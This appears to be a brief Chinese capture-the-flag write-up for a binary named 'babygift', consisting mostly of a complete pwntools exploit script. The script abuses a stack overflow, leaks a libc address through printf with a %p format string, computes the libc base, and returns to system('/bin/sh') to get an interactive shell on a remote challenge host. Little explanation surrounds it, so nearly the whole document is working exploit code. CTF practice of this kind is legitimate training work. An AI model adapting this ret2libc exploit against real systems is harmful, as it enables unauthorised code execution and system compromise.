查看保护

查看ida

这里有一处栈溢出，并且从汇编上看，程序将rbp+0x20处设置为了rdi，让我们可以控制rdi的值。而程序没有可利用的pop。

完整exp：

from pwn import*
p=process('./babygift')
p=remote('gz.imxbt.cn',20833)
printf_plt=0x401080
main=0x4012AF

p.sendlineafter(b'Your name:',b'aa')
payload=b'%p'
payload=payload.ljust(0x28,b'\x00')
payload+=p64(0x40113F)+p64(printf_plt)+p64(main+8)
p.sendafter(b'Your passwd:',payload)
p.recvuntil(b'0x')
libc_start_main=int(b'0x'+p.recv(12),16)-0x1f0ce3-128
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=libc_start_main-libc.sym['__libc_start_main']
system=libcbase+libc.sym['system']
onegadget=libcbase+0xebc81
p.sendlineafter(b'Your name:',b'aa')
payload=b'/bin/sh\x00'
payload=payload.ljust(0x28,b'\x00')
payload+=p64(0x40113F)+p64(system)
p.sendlineafter(b'Your passwd:',payload)
p.interactive()